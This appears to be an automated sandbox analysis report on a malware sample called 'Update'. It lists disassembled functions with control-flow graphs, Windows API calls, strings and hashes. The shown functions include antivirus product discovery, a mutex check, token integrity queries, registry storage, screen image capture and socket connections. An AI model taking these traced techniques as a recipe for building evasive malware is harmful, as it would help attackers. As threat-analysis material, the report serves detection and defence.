                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                                • String ID: 0u
                                                                                                • API String ID: 640718063-3203441087
                                                                                                • Opcode ID: 94c689521af4947466c8b86645af49a3b04e56d54b71338c9307917d991564e9
                                                                                                • Instruction ID: d5696d751933d4553be470da2890fc26df070c3c16b6f4ec0f7763c80930fe30
                                                                                                • Opcode Fuzzy Hash: 94c689521af4947466c8b86645af49a3b04e56d54b71338c9307917d991564e9
                                                                                                • Instruction Fuzzy Hash: 136152B1A40304BFE710DFA4CC85FAAB7B9FF49711F104629F646AB2D0D7B1A9048B64

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1359 37f6a70-37f6ae3 call 37feff4 GetCurrentProcessId wsprintfW call 37f6910 call 3806770 GetVersionExW 1366 37f6ae9-37f6af0 1359->1366 1367 37f6be6-37f6bec 1359->1367 1366->1367 1369 37f6af6-37f6afd 1366->1369 1368 37f6c14-37f6c21 wsprintfW 1367->1368 1371 37f6c24-37f6c26 1368->1371 1369->1367 1370 37f6b03-37f6b21 GetCurrentProcess OpenProcessToken 1369->1370 1370->1367 1372 37f6b27-37f6b47 GetTokenInformation 1370->1372 1373 37f6c28-37f6c2e call 37ffac9 1371->1373 1374 37f6c31-37f6c46 call 37ff00a 1371->1374 1375 37f6bbb-37f6bce CloseHandle 1372->1375 1376 37f6b49-37f6b52 GetLastError 1372->1376 1373->1374 1381 37f6bf6-37f6bfc 1375->1381 1382 37f6bd0 1375->1382 1376->1375 1379 37f6b54-37f6b6b LocalAlloc 1376->1379 1379->1375 1386 37f6b6d-37f6b8d GetTokenInformation 1379->1386 1384 37f6c0e-37f6c0f 1381->1384 1385 37f6bfe-37f6c04 1381->1385 1387 37f6bee-37f6bf4 1382->1387 1388 37f6bd2-37f6bd4 1382->1388 1384->1368 1385->1371 1389 37f6c06-37f6c0c 1385->1389 1390 37f6b8f-37f6bac GetSidSubAuthorityCount GetSidSubAuthority 1386->1390 1391 37f6bae-37f6bb5 LocalFree 1386->1391 1387->1368 1388->1367 1392 37f6bd6-37f6bdc 1388->1392 1389->1368 1390->1391 1391->1375 1392->1371 1393 37f6bde-37f6be4 1392->1393 1393->1368
                                                                                                APIs
                                                                                                • GetCurrentProcessId.KERNEL32(75BF73E0), ref: 037F6A94
                                                                                                • wsprintfW.USER32 ref: 037F6AA7
                                                                                                  • Part of subcall function 037F6910: GetCurrentProcessId.KERNEL32(4EB10097,00000000,00000000,75BF73E0,?,00000000,038110DB,000000FF,?,037F6AB3,00000000), ref: 037F6938
                                                                                                  • Part of subcall function 037F6910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,038110DB,000000FF,?,037F6AB3,00000000), ref: 037F6947
                                                                                                  • Part of subcall function 037F6910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,038110DB,000000FF,?,037F6AB3,00000000), ref: 037F6960
                                                                                                  • Part of subcall function 037F6910: CloseHandle.KERNEL32(00000000,?,00000000,038110DB,000000FF,?,037F6AB3,00000000), ref: 037F696B
                                                                                                • _memset.LIBCMT ref: 037F6AC2
                                                                                                • GetVersionExW.KERNEL32(?), ref: 037F6ADB
                                                                                                • GetCurrentProcess.KERNEL32(00000008,?), ref: 037F6B12
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 037F6B19
                                                                                                • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 037F6B3F
                                                                                                • GetLastError.KERNEL32 ref: 037F6B49
                                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 037F6B5D
                                                                                                • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 037F6B85
                                                                                                • GetSidSubAuthorityCount.ADVAPI32 ref: 037F6B98
                                                                                                • GetSidSubAuthority.ADVAPI32(00000000), ref: 037F6BA6
                                                                                                • LocalFree.KERNEL32(?), ref: 037F6BB5
                                                                                                • CloseHandle.KERNEL32(?), ref: 037F6BC2
                                                                                                • wsprintfW.USER32 ref: 037F6C1B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                                                                                • String ID: -N/$NO/$None/%s
                                                                                                • API String ID: 3036438616-3095023699
                                                                                                • Opcode ID: f8fa4927da4128d3d9f484f948c4d55d98ce6b772c83efe20b02a67382812e00
                                                                                                • Instruction ID: e57d0b84ecd04c5e27301c9db830c369d5ac3b658752aa259214d0fe647af8fe
                                                                                                • Opcode Fuzzy Hash: f8fa4927da4128d3d9f484f948c4d55d98ce6b772c83efe20b02a67382812e00
                                                                                                • Instruction Fuzzy Hash: D64180B0A00218AFDB20EBA4DC88FEEB7BCFB49710F0445D5E64596345DA34DA90CFA1

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1394 37fad10-37fad2b 1395 37fad2d-37fad5b RegOpenKeyExW 1394->1395 1396 37fad84-37fad8f 1394->1396 1397 37fad5d-37fad73 RegQueryValueExW 1395->1397 1398 37fad79-37fad7e 1395->1398 1399 37fb845-37fb84b call 37fce00 1396->1399 1400 37fad95-37fad9c 1396->1400 1397->1398 1398->1396 1402 37fb84e-37fb854 1398->1402 1399->1402 1403 37fadea-37fadf1 1400->1403 1404 37fafe3-37fb09b call 37ff707 call 3806770 call 37feff4 call 3807660 call 37ff707 call 37fcf20 call 37feff4 1400->1404 1403->1402 1405 37fadf7-37fae29 call 37ff707 call 3806770 1403->1405 1450 37fb162-37fb189 call 37ffa29 CloseHandle 1404->1450 1451 37fb0a1-37fb0ee call 3807660 RegCreateKeyW 1404->1451 1416 37fae2b-37fae3f wsprintfW 1405->1416 1417 37fae42-37fae4e 1405->1417 1416->1417 1419 37fae9a-37faef1 call 37feff4 call 3807660 call 37f2ba0 call 37fefff * 2 1417->1419 1420 37fae50 1417->1420 1424 37fae54-37fae5f 1420->1424 1427 37fae60-37fae66 1424->1427 1430 37fae68-37fae6b 1427->1430 1431 37fae86-37fae88 1427->1431 1434 37fae6d-37fae75 1430->1434 1435 37fae82-37fae84 1430->1435 1436 37fae8b-37fae8d 1431->1436 1434->1431 1441 37fae77-37fae80 1434->1441 1435->1436 1437 37fae8f-37fae98 1436->1437 1438 37faef4-37faf09 1436->1438 1437->1419 1437->1424 1444 37faf10-37faf16 1438->1444 1441->1427 1441->1435 1447 37faf18-37faf1b 1444->1447 1448 37faf36-37faf38 1444->1448 1453 37faf1d-37faf25 1447->1453 1454 37faf32-37faf34 1447->1454 1449 37faf3b-37faf3d 1448->1449 1456 37faf3f-37faf41 1449->1456 1457 37fafae-37fafe0 call 37ffa29 CloseHandle call 37fefff 1449->1457 1471 37fb14a-37fb15f RegCloseKey call 37ffac9 1451->1471 1472 37fb0f0-37fb13f call 37feff4 call 37f5a30 RegDeleteValueW RegSetValueExW 1451->1472 1453->1448 1455 37faf27-37faf30 1453->1455 1454->1449 1455->1444 1455->1454 1462 37faf55-37faf5c 1456->1462 1463 37faf43-37faf4e call 37fefff 1456->1463 1469 37faf5e-37faf69 call 37ffac9 1462->1469 1470 37faf70-37faf74 1462->1470 1463->1462 1469->1470 1478 37faf76-37faf7f call 37fefff 1470->1478 1479 37faf85-37fafa9 call 37ff020 1470->1479 1471->1450 1472->1471 1490 37fb141-37fb147 call 37ffac9 1472->1490 1478->1479 1479->1419 1490->1471
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 037FAD53
                                                                                                • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 037FAD73
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: OpenQueryValue
                                                                                                • String ID: %s_bin$Console$Console\0$IpDatespecial
                                                                                                • API String ID: 4153817207-1338088003
                                                                                                • Opcode ID: aa5fefa52fab436100ddaf02a84d80bed593db8cf53b453acf27fd7932347c85
                                                                                                • Instruction ID: ad32f3a8f1c48588fbe716f03563a32b5e75fc2faae3fcbb3d2c5a2ed857e56a
                                                                                                • Opcode Fuzzy Hash: aa5fefa52fab436100ddaf02a84d80bed593db8cf53b453acf27fd7932347c85
                                                                                                • Instruction Fuzzy Hash: 25C1CFB5A003009FE710EF24DC45F6BB3E8BF94714F084668EA599B381E671E914CBA2

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1493 37f6150-37f61a5 call 3806770 call 380004b 1498 37f61a7-37f61ae 1493->1498 1499 37f6201-37f6228 CoCreateInstance 1493->1499 1500 37f61b0-37f61b2 call 37f6050 1498->1500 1501 37f622e-37f6282 1499->1501 1502 37f6422-37f642f lstrlenW 1499->1502 1509 37f61b7-37f61b9 1500->1509 1510 37f640a-37f6418 1501->1510 1511 37f6288-37f62a2 1501->1511 1503 37f6441-37f6450 1502->1503 1504 37f6431-37f643b lstrcatW 1502->1504 1507 37f645a-37f647a call 37ff00a 1503->1507 1508 37f6452-37f6457 1503->1508 1504->1503 1508->1507 1513 37f61db-37f61ff call 380004b 1509->1513 1514 37f61bb-37f61d9 lstrcatW * 2 1509->1514 1510->1502 1517 37f641a-37f641f 1510->1517 1511->1510 1520 37f62a8-37f62b4 1511->1520 1513->1499 1513->1500 1514->1513 1517->1502 1521 37f62c0-37f6363 call 3806770 wsprintfW RegOpenKeyExW 1520->1521 1524 37f63e9-37f63ff 1521->1524 1525 37f6369-37f63ba call 3806770 RegQueryValueExW 1521->1525 1528 37f6402-37f6404 1524->1528 1529 37f63dc-37f63e3 RegCloseKey 1525->1529 1530 37f63bc-37f63da lstrcatW * 2 1525->1530 1528->1510 1528->1521 1529->1524 1530->1529
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 037F618B
                                                                                                • lstrcatW.KERNEL32(03821F10,0381510C,?,4EB10097,00000AD4,00000000,75BF73E0), ref: 037F61CD
                                                                                                • lstrcatW.KERNEL32(03821F10,0381535C,?,4EB10097,00000AD4,00000000,75BF73E0), ref: 037F61D9
                                                                                                • CoCreateInstance.OLE32(03812480,00000000,00000017,0381578C,?,?,4EB10097,00000AD4,00000000,75BF73E0), ref: 037F6220
                                                                                                • _memset.LIBCMT ref: 037F62CE
                                                                                                • wsprintfW.USER32 ref: 037F6336
                                                                                                • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 037F635F
                                                                                                • _memset.LIBCMT ref: 037F6376
                                                                                                  • Part of subcall function 037F6050: _memset.LIBCMT ref: 037F607C
                                                                                                  • Part of subcall function 037F6050: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 037F6088
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                                                                                • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                                • API String ID: 1221949200-1583895642
                                                                                                • Opcode ID: faa2440ee7cc2a63d4949af17c291931a26da5a004b9c44fdfb0fc0105558647
                                                                                                • Instruction ID: 5adddbb2ea87bfa844c07227a35de22fef64a2f50407c30569286692600c6844
                                                                                                • Opcode Fuzzy Hash: faa2440ee7cc2a63d4949af17c291931a26da5a004b9c44fdfb0fc0105558647
                                                                                                • Instruction Fuzzy Hash: 1D8161B1A00628AFDB20DB94CC45FAEB7BCEB89704F1445C8F719A7245D774AA80CF65

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1531 37f5f40-37f5f7b CreateMutexW GetLastError 1532 37f5f7d 1531->1532 1533 37f5f9b-37f5fa2 1531->1533 1534 37f5f80-37f5f99 Sleep CreateMutexW GetLastError 1532->1534 1535 37f5fa4-37f5faa 1533->1535 1536 37f6003-37f602d GetModuleHandleW GetConsoleWindow call 37fe4f0 1533->1536 1534->1533 1534->1534 1538 37f5fb0-37f5fe1 call 3806770 lstrlenW call 37f6d70 1535->1538 1541 37f602f-37f6045 call 37ff00a 1536->1541 1542 37f6048-37f604f call 37fe850 1536->1542 1550 37f5ff3-37f6001 Sleep 1538->1550 1551 37f5fe3-37f5ff1 lstrcmpW 1538->1551 1550->1536 1550->1538 1551->1536 1551->1550
                                                                                                APIs
                                                                                                • CreateMutexW.KERNEL32(00000000,00000000,2024.12.13), ref: 037F5F66
                                                                                                • GetLastError.KERNEL32 ref: 037F5F6E
                                                                                                • Sleep.KERNEL32(000003E8), ref: 037F5F85
                                                                                                • CreateMutexW.KERNEL32(00000000,00000000,2024.12.13), ref: 037F5F90
                                                                                                • GetLastError.KERNEL32 ref: 037F5F92
                                                                                                • _memset.LIBCMT ref: 037F5FB9
                                                                                                • lstrlenW.KERNEL32(?), ref: 037F5FC6
                                                                                                • lstrcmpW.KERNEL32(?,03815328), ref: 037F5FED
                                                                                                • Sleep.KERNEL32(000003E8), ref: 037F5FF8
                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 037F6005
                                                                                                • GetConsoleWindow.KERNEL32 ref: 037F600F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                                                                                • String ID: 2024.12.13$key$open
                                                                                                • API String ID: 2922109467-2572726197
                                                                                                • Opcode ID: 0526194d61d7a59109250190e074b3a53a55313583ad607e63f7a102414e211d
                                                                                                • Instruction ID: b5ee2c52c7154a3001a2c55782b301d56c64b3df186f1f783ed5ed766a82e1a4
                                                                                                • Opcode Fuzzy Hash: 0526194d61d7a59109250190e074b3a53a55313583ad607e63f7a102414e211d
                                                                                                • Instruction Fuzzy Hash: 4021D372A447099FD624FBB4EC45F5EB39CEB84610F1409A9E7049B2C1EB70A509CBA3

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1552 37f62b6-37f62bd 1553 37f62c0-37f6363 call 3806770 wsprintfW RegOpenKeyExW 1552->1553 1556 37f63e9-37f63ff 1553->1556 1557 37f6369-37f6376 call 3806770 1553->1557 1560 37f6402-37f6404 1556->1560 1559 37f637b-37f63ba RegQueryValueExW 1557->1559 1561 37f63dc-37f63e3 RegCloseKey 1559->1561 1562 37f63bc-37f63da lstrcatW * 2 1559->1562 1560->1553 1563 37f640a-37f6418 1560->1563 1561->1556 1562->1561 1564 37f641a-37f641f 1563->1564 1565 37f6422-37f642f lstrlenW 1563->1565 1564->1565 1566 37f6441-37f6450 1565->1566 1567 37f6431-37f643b lstrcatW 1565->1567 1568 37f645a-37f647a call 37ff00a 1566->1568 1569 37f6452-37f6457 1566->1569 1567->1566 1569->1568
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 037F62CE
                                                                                                • wsprintfW.USER32 ref: 037F6336
                                                                                                • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 037F635F
                                                                                                • _memset.LIBCMT ref: 037F6376
                                                                                                • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 037F63B2
                                                                                                • lstrcatW.KERNEL32(03821F10,?), ref: 037F63CE
                                                                                                • lstrcatW.KERNEL32(03821F10,0381535C), ref: 037F63DA
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 037F63E3
                                                                                                • lstrlenW.KERNEL32(03821F10,?,4EB10097,00000AD4,00000000,75BF73E0), ref: 037F6427
                                                                                                • lstrcatW.KERNEL32(03821F10,038153D4,?,4EB10097,00000AD4,00000000,75BF73E0), ref: 037F643B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                                                                                • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                                • API String ID: 1671694837-1583895642
                                                                                                • Opcode ID: 627ce75ae380f67162fca75c5e6c41588b3004f9447f04761e281ab21ad9d105
                                                                                                • Instruction ID: d1c33c584d1c2f36f53cdfd1b00036d79f60566bf74b5b0fa99f57c8e7504203
                                                                                                • Opcode Fuzzy Hash: 627ce75ae380f67162fca75c5e6c41588b3004f9447f04761e281ab21ad9d105
                                                                                                • Instruction Fuzzy Hash: 784183B1600668AFDB24DB94CC54FAEB7BCAF88705F1441C8F319A7281D6749B80CF65

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1572 37f7490-37f74a6 LoadLibraryW 1573 37f759e-37f75a2 1572->1573 1574 37f74ac-37f74ba GetProcAddress 1572->1574 1575 37f7597-37f7598 FreeLibrary 1574->1575 1576 37f74c0-37f7525 call 37ff858 call 37feff4 call 37f7410 1574->1576 1575->1573 1584 37f7527-37f7530 1576->1584 1585 37f7532-37f7536 1576->1585 1586 37f753b-37f756b RegOpenKeyExW RegQueryValueExW 1584->1586 1585->1586 1587 37f756d-37f756f 1586->1587 1588 37f7582-37f758d RegCloseKey call 37ffac9 1586->1588 1587->1588 1590 37f7571-37f757f call 37ffc0e 1587->1590 1591 37f7592-37f7596 1588->1591 1590->1588 1591->1575
                                                                                                APIs
                                                                                                • LoadLibraryW.KERNEL32(ntdll.dll,75BF73E0,?,?,?,037F5611,0000035E,000002FA), ref: 037F749C
                                                                                                • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 037F74B2
                                                                                                • swprintf.LIBCMT ref: 037F74EF
                                                                                                  • Part of subcall function 037F7410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,037F7523), ref: 037F743D
                                                                                                  • Part of subcall function 037F7410: GetProcAddress.KERNEL32(00000000), ref: 037F7444
                                                                                                  • Part of subcall function 037F7410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,037F7523), ref: 037F7452
                                                                                                • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 037F7547
                                                                                                • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 037F7563
                                                                                                • RegCloseKey.KERNEL32(000002FA), ref: 037F7586
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,037F5611,0000035E,000002FA), ref: 037F7598
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                                                                                • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                                                • API String ID: 2158625971-3190923360
                                                                                                • Opcode ID: 4d0da07049bb65de7906537f385989f4890357b82fa0896f2dd05031a1d5dd63
                                                                                                • Instruction ID: ae7f60112b9be380a2f49061de47250a841f89f49e69e7841c145502d2c9b3da
                                                                                                • Opcode Fuzzy Hash: 4d0da07049bb65de7906537f385989f4890357b82fa0896f2dd05031a1d5dd63
                                                                                                • Instruction Fuzzy Hash: 58319375A00308BFD718EBA4DC45EBF7BBCEB48740F140559BB05E6245EA74DA00C760
                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 6CA98CD2
                                                                                                • SHGetFolderPathA.SHELL32 ref: 6CA98CEF
                                                                                                • _strlen.LIBCMT ref: 6CA98D13
                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 6CA99092
                                                                                                • CoInitialize.OLE32(00000000), ref: 6CA990A3
                                                                                                • CoCreateInstance.OLE32(6CABF3C0,00000000,00000001,6CABEC50,?), ref: 6CA990BB
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104), ref: 6CA990EA
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104), ref: 6CA99139
                                                                                                • CoUninitialize.COMBASE ref: 6CA9915D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesByteCharFileMultiWide$CreateFolderInitializeInstancePathUninitialize_strlen
                                                                                                • String ID: \$e\
                                                                                                • API String ID: 1074249417-3851158279
                                                                                                • Opcode ID: 38da3285b16c6fdbde2d740dfabb20b1e63aafd9fe2cb90c1746e11b3f2291b5
                                                                                                • Instruction ID: 67a892c1c00faa15401bc64ab613169eadc23add07a539dec0195a149de0d074
                                                                                                • Opcode Fuzzy Hash: 38da3285b16c6fdbde2d740dfabb20b1e63aafd9fe2cb90c1746e11b3f2291b5
                                                                                                • Instruction Fuzzy Hash: BF32EF71D142188FDB24CF68C9897AEBBF1BF45304F148699E419AB690DB319EC8CF91
                                                                                                APIs
                                                                                                • GlobalAlloc.KERNEL32(00000002,?,4EB10097,?,00000000,?), ref: 037FC09E
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 037FC0AA
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 037FC0BF
                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 037FC0D5
                                                                                                • EnterCriticalSection.KERNEL32(0381FB64), ref: 037FC113
                                                                                                • LeaveCriticalSection.KERNEL32(0381FB64), ref: 037FC124
                                                                                                  • Part of subcall function 037F9DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 037F9E04
                                                                                                  • Part of subcall function 037F9DE0: GdipDisposeImage.GDIPLUS(?), ref: 037F9E18
                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 037FC14C
                                                                                                  • Part of subcall function 037FA460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 037FA48D
                                                                                                  • Part of subcall function 037FA460: _free.LIBCMT ref: 037FA503
                                                                                                • GetHGlobalFromStream.OLE32(?,?), ref: 037FC16D
                                                                                                • GlobalLock.KERNEL32(?), ref: 037FC177
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 037FC18F
                                                                                                  • Part of subcall function 037F9BA0: DeleteObject.GDI32(?), ref: 037F9BD2
                                                                                                  • Part of subcall function 037F9BA0: EnterCriticalSection.KERNEL32(0381FB64,?,?,?,037F9B7B), ref: 037F9BE3
                                                                                                  • Part of subcall function 037F9BA0: EnterCriticalSection.KERNEL32(0381FB64,?,?,?,037F9B7B), ref: 037F9BF8
                                                                                                  • Part of subcall function 037F9BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,037F9B7B), ref: 037F9C04
                                                                                                  • Part of subcall function 037F9BA0: LeaveCriticalSection.KERNEL32(0381FB64,?,?,?,037F9B7B), ref: 037F9C15
                                                                                                  • Part of subcall function 037F9BA0: LeaveCriticalSection.KERNEL32(0381FB64,?,?,?,037F9B7B), ref: 037F9C1C
                                                                                                • GlobalSize.KERNEL32(00000000), ref: 037FC1A5
                                                                                                • GlobalUnlock.KERNEL32(?), ref: 037FC221
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 037FC249
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                                                                                • String ID:
                                                                                                • API String ID: 1483550337-0
                                                                                                • Opcode ID: 29192fc120f8c2df2d8a231c6284196db64e3ddb28c6d0e1b7bd46b0ed321344
                                                                                                • Instruction ID: 6875a894c2c1b164d394524e174f4f47550a7212382434b45921105fe43951bc
                                                                                                • Opcode Fuzzy Hash: 29192fc120f8c2df2d8a231c6284196db64e3ddb28c6d0e1b7bd46b0ed321344
                                                                                                • Instruction Fuzzy Hash: A46128B5D00219AFCB10EFE8D88899EBBB8FF49710F104569E625A7341DB34A901CF50
                                                                                                APIs
                                                                                                  • Part of subcall function 6CA993E0: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 6CA9941E
                                                                                                  • Part of subcall function 6CA993E0: _strlen.LIBCMT ref: 6CA9943A
                                                                                                • _strlen.LIBCMT ref: 6CA99B62
                                                                                                • _strlen.LIBCMT ref: 6CA99CD0
                                                                                                • CreateThread.KERNEL32(00000000,00000000,6CA98770,6CACC338,00000000,00000000), ref: 6CA99E21
                                                                                                • CreateThread.KERNEL32(00000000,00000000,6CA980E0,00000000,00000000,00000000), ref: 6CA99E36
                                                                                                • WaitForSingleObject.KERNEL32(00000000,00011170), ref: 6CA99E48
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 6CA99E56
                                                                                                • CreateThread.KERNEL32(00000000,00000000,6CA92090,00000000,00000000,00000000), ref: 6CA99F65
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
